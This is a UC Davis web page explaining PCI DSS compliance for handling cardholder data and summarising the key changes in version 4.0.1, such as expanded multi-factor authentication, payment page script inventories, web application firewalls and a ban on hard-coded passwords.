Staff Directory  |  Forms  |  Org Chart  |  About Us

Payment Card Industry Data Security Standards (PCI DSS)

PCI DSS Compliance

PCI DSS is a set of technical and operational requirements established by the PCI Security Standards Council to safeguard cardholder data. Compliance with PCI DSS is enforced by payment card brands and is mandatory for all organizations that handle cardholder data.

At UC Davis, we take PCI DSS compliance seriously and have implemented measures to protect cardholder data. Failure to comply with any of the PCI DSS requirements may result in:

  • Fines and penalties
  • Diminished sales
  • Lawsuits
  • Reputational damage
  • Higher subsequent costs of compliance

PCI DSS v4.0.1

This version represents a significant update to the global standard for payment security, addressing emerging threats and technologies to better protect payment data. The release followed extensive feedback from the global payments industry, with over 200 organizations providing more than 6,000 items of feedback over three years

Key Changes and Impact:

Customized Approach:

  • Change: Introduction of a customized approach for meeting security objectives, allowing organizations to use innovative methods and technologies to meet the intent of PCI DSS requirements
  • Impact: Provides greater flexibility for organizations to implement security measures that best fit their unique environments and risk profiles.

Expanded Multi-Factor Authentication (MFA):

  • Change: Expansion of MFA requirements to include all access into the cardholder data environment, not just for remote access
  • Impact: Enhances the security of access controls, reducing the risk of unauthorized access to sensitive cardholder data.

Continuous Compliance:

  • Change: Emphasis on security as an ongoing process, encouraging organizations to continuously monitor and improve their security posture
  • Impact: Promotes a proactive approach to security, helping organizations stay ahead of evolving threats.

Stronger Encryption Standards:

  • Change: Updated encryption requirements to ensure stronger protection of cardholder data during transmission and storage
  • Impact: Enhances data protection, reducing the risk of data breaches and unauthorized access.

Support for Cloud Environments:

  • Change: New requirements and guidance for securing cardholder data in cloud environments
  • Impact: Addresses the increasing use of cloud services, ensuring that cardholder data remains secure in these environments.

Greater Emphasis on Risk Assessments:

  • Change: Increased focus on conducting regular risk assessments to identify and address potential security threats
  • Impact: Helps organizations identify vulnerabilities and implement appropriate security measures to mitigate risks.

Updated Terminology:

  • Change: Changes in terminology, such as updating "firewall" to "network security controls," to encompass a broader range of technologies
  • Impact: Ensures the standard remains relevant and applicable to modern technologies and security practices.

Payment Page Script Security:

  • Requirement: Ensure the authenticity and authorization of every third-party script enabled on the checkout page, with a documented inventory and justification for each script.
  • Impact: Protects against web skimming, e-skimming, and form jacking attacks

Enhanced Web Protection:

  • Requirement: Implement a Web Application Firewall (WAF) on public-facing web applications.
  • Impact: Provides an additional layer of security to protect against web-based attacks

Automated Audit Log Reviews:

  • Requirement: Conduct automated reviews of audit logs to detect and respond to security incidents.
  • Impact: Improves the ability to identify and respond to potential security breaches

Authenticated Internal Vulnerability Scans:

  • Requirement: Perform authenticated internal vulnerability scans to identify and address security weaknesses.
  • Impact: Enhances the detection and remediation of vulnerabilities within the internal network

Management of Cryptographic Keys and Certificates:

  • Requirement: Maintain inventories of certificates and keys, and ensure proper management and usage.
  • Impact: Strengthens the security of cryptographic processes and protects sensitive data

No Hard-Coded Passwords:

  • Requirement: Ensure that no hard-coded passwords are used in scripts or configuration files.
  • Impact: Reduces the risk of unauthorized access due to exposed credentials

Security Awareness Program:

  • Requirement: Include training on phishing, social engineering, and acceptable use of technologies, with annual reviews of the program.
  • Impact: Enhances employee awareness and preparedness against common security threats